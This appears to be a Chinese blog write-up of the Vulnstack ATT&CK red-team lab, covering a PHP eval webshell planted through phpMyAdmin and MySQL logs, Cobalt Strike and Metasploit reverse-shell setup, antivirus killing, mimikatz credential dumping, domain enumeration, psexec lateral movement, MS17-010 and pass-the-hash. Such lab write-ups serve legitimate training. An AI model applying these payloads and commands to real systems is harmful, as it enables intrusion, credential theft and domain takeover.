从WEB到内网横向&&CS后渗透&&MSF后渗透&&哈希传递------ATK&CK红队评估(一)

ATK&CK红队评估(一)
环境下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

环境搭建

image.png
三台虚拟主机默认开机密码都是 hongrisec@2019
win2003和win2008可能会提示密码过期,自己修改即可。

网络拓扑

Network Diagram.png
win7服务器就是网关,要配置两张网卡,一张对外提供web服务,一张通向内网。
1.vmware中给win7添加一张网卡。
image.png
2.将网络适配器 1 设置成 VMnet1 仅主机模式(内网),网络适配器 2 设置成 NAT 模式(外网)
image.png
3.将win2003、win2008 网络适配器设置成VMnet1仅主机模式(内网)。
image.png
登录查看三台主机ip。
win7:192.168.52.143(内)/192.168.126.188(外)
image.png
win2003:192.168.52.141
image.png
win2008:192.168.52.138
image.png
攻击机kali:192.168.126.130
用win7ping一下kali,看是否通。
image.png

在win7里找到phpstudy开启web服务。
image.png

信息收集

nmap端口扫描:
nmap --min-rate 10000 -p- 192.168.126.188
image.png
nmap -p 80,3306 -sV 192.168.126.188
image.png
可以看到目标开放了80,3306端口
80-http
3306-mysql
访问192.168.126.188:80
image.png
啥都没有,dirsearch扫一下目录。
dirsearch -u http://192.168.126.188
image.png

攻击尝试

主要是phpmyadmin。访问一下,尝试弱口令登录。
image.png
试了几次就成功登录了,root/root标准的弱口令,如果猜不出来直接上字典爆破。
image.png
在php探针中得知网站绝对路径C:/phpStudy/WWW
image.png

phpmyadmin后台getshell

最常用的就是into outfile写入木马了,当然还有利用Mysql日志文件getshell。

1.into outfile写入木马

已经知道了网站绝对路径,直接写入试试。
select '<?php eval($_POST[cmd]);?>' into outfile 'C:/phpStudy/www/shell.php';
image.png
失败。应该是secure_file_priv的值为NULL,导致不被允许读取任何文件。可以查看一下:
show global variables like '%secure%';
image.png
果然是NULL,不允许into outfile方式写入木马,那就试一下日志文件getshell。

Mysql日志文件写入shell

查看日志状态:
show variables like '%general%';
image.png
general_log为off,MySQL不在写入日志,需要将它打开。打开后,操作都将记录在general_log_file指定的文件目录中。
SET GLOBAL general_log='on';
image.png
指定日志写入shell.php中
SET GLOBAL general_log_file='C:/phpStudy/www/shell.php';
image.png
再看一下日志状态:
show variables like '%general%';
image.png
现在直接把一句话木马写入shell.php中,只需要select一下木马,日志就会将它写入shell.php中:
SELECT '<?php eval($_POST["cmd"]);?>';
image.png
有了后门就直接试一下蚁剑链接。
image.png
image.png

内网渗透

cs植入后门

1.生成exe后门。
image.png
生成后的exe使用蚁剑进行上传到靶机
image.png
在蚁剑的shell中执行后门:
start artifact.exe
image.png
cs可以看到目标已经上线。
image.png
MS14-058提权:
image.png
成功提到system权限
image.png
先将心跳时间设置为3s,实战中不能过快。
image.png

信息收集

whoami
net start 
ipconfig /all   #查看本机ip,所在域
route print     #打印路由信息
net view        # 查看局域网内其他主机名
net config Workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user        # 查看本机用户列表
net user /domain         # 查看域用户
net localgroup administrators # 查看本地管理员组
net view /domain         # 查看有几个域
net group 组名 /domain    # 查看域中某工作组
net user 用户名 /domain   # 获取指定域用户的信息
net group "domain admins" /domain  # 查看域管理员
net group "domain computers" /domain  # 查看域中的其他主机名
net group "doamin controllers" /domain  # 查看域控
wmic useraccount get /all        #获取域内用户的详细信息

image.png
有god.org的域
shell net config Workstation
image.png
查看域信息:shell net view
image.png
查看主域信息:shell net view /domain
image.png
查询当前的登录域与用户信息:shell net config workstation
image.png
域控的域名即 owa.god.org ,用 ping 即可反查出域控ip为192.168.52.138
获取域内用户的详细信息:shell wmic useraccount get /all
image.png
mimikatz抓取hash和明文密码,然后查看密码凭证
image.png
用CS的hashdump去读内存密码,用mimakatz读注册表密码:logonpasswords
image.png
探测内网其他主机
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL="
image.png
信息收集结果:

域名:god.org
域内五个用户:Administrator、Guest、liukaifeng01、krbtgt、ligang
域内三台主机:OWA、ROOT-TVI862UBEH(192.168.52.141)、STU1(win7)
域控:OWA(192.168.52.138)
win7内网ip:192.168.52.143

CS 横向移动

通过net view看到还有两个域用户。OWA和ROOT-TVI862UBEH。
image.png
新建一个listener,payload设置为Beacon SMB:
image.png
已有的beacon上右键spawn生成会话,进行派生
image.png
image.png
成功后这里又会一个这样的标识。
image.png
回到target列表,又键非域控主机,使用psexec横向。
image.png
image.png
成功上线ROOT-TVI862UBEH
image.png
同理上线OWA
image.png
image.png
三台目标机器全部拿下。

MSF横向移动

1.msf开启监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.126.130
set lport 6666
run

cs创建一个listener
image.png
蚁剑上传木马到目标靶机然后执行。
image.png
检查主机是否运行在虚拟机上:
run post/windows/gather/checkvm
image.png
关掉主机杀毒软件:
run post/windows/manage/killav
获取目标详情:
sysinfo
image.png
配置静态路由
run post/multi/manage/autoroute #加载autoroute模块,探测当前机器所有网段信息
run post/multi/manage/autoroute SUBNET=192.168.52.0 ACTION=ADD #添加目标内网路由

2.扫描漏洞(ms17-010)

使用msf直接扫描域控win2008:

use auxiliary/scanner/portscan/tcp
set rhost 192.158.52.138
set ports 80,135-139,445,3306,3389
run

image.png

search ms17_010
use auxiliary/scanner/smb/smb_ms17-010
set rhosts 192.168.52.138
run

image.png
存在漏洞。
利用

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.52.138
run

失败。

哈希传递攻击(PTH)

hashdump
image.png
load kiwi
image.png
psexec|hash传递
探测445:

use auxiliary/scanner/smb/smb_version 
set rhost 192.168.52.138
set threads 40
run
set rhost 192.168.52.141
run

image.png
exploit/windows/smb/psexec模块哈希传递攻击 Windows Server 2008

use exploit/windows/smb/psexec
set rhosts 192.168.126.188
set SMBUser administrator 
set smbpass 00000000000000000000000000000000:NTLM值

成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值